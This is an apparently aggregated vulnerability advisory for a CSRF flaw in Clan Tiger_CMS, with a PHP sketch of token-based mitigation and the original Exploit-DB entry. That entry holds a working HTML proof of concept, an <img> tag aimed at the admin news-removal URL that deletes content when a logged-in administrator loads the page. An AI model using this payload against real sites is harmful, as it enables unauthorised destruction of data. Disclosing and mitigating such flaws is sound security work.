Vendor: Clan Tiger_CMS
By: Pratul Agrawal
CVSS: 8,8 (HIGH)
CWE: 352, Cross Site Request Forgery (CSRF)
Product Name: Clan Tiger_CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: clantiger
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Clan Tiger_CMS CSRF Vulnerability

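A CSRF vulnerability was found in the Admin module of Clan Tiger_CMS. An attacker can delete the News content by sending a malicious request to the targeted URL. As the proof of concept below shows, the removal action (index.php?module=news&action=remove&id=...) is reachable with a plain GET request, so the request can be embedded in an <img> tag on another page. After execution, the content is deleted automatically.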

Mitigation:

Implementing a CSRF token in the application can help prevent CSRF attacks.
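
The CSRF-token mitigation named above, combined with refusing GET for the removal action, sketched in PHP as an added example. It is not code from Clan Tiger_CMS or from the advisory; the function names, the `csrf_token` field name and the simulated requests are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: issue (or reuse) a random per-session token.
// The application embeds it as a hidden field in every state-changing form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hypothetical gate for a state-changing action such as news removal.
// Returns an HTTP status: 200 allow, 405 wrong method, 403 missing/bad token.
// In a real handler the arguments would be $_SERVER['REQUEST_METHOD'],
// $_POST and $_SESSION (after session_start()).
function check_state_change(string $method, array $post, array $session): int
{
    if ($method !== 'POST') {
        return 405; // <img>, <a> and prefetch all issue GET; GET must never delete
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($expected) || !is_string($supplied) || $expected === ''
        || !hash_equals($expected, $supplied)) { // constant-time comparison
        return 403;
    }
    return 200;
}

// Constructed requests (not captured traffic) against one simulated session.
$session = [];
$token = csrf_token($session);
$cases = [
    'cross-site GET (img tag)'       => ['GET',  []],
    'cross-site POST, no token'      => ['POST', ['id' => '1']],
    'cross-site POST, guessed token' => ['POST', ['id' => '1', 'csrf_token' => str_repeat('0', 64)]],
    'same-site form with token'      => ['POST', ['id' => '1', 'csrf_token' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    printf("%-32s -> %d\n", $label, check_state_change($method, $post, $session));
}
```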

Exploit-DB raw data:

=======================================================================
                   Clan Tiger_CMS CSRF Vulnerability
=======================================================================

  # Vulnerability found in- Admin module
  # email         Pratulag@yahoo.com
  # company       aksitservices
  # Credit by     Pratul Agrawal
  # Software      Clan Tiger_CMS
  # Category      CMS / Portals
  # Site p4ge     http://server/clantiger/index.php?module=login
  # Greetz to     Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
  
   
   
  #  Proof of concept   #
 
  Targeted URL:  http://servername/clantiger/
  
 
   Script to Delete the News content through Cross Site request forgery
   
   ....................................................................

   <html>
     <body>
       <img src=http://server/clantiger/index.php?module=news&action=remove&id=[user ID] />
     </body>
   </html>

   ....................................................................
   
   
   
  After execution, refresh the page and you can see that the added content is deleted automatically.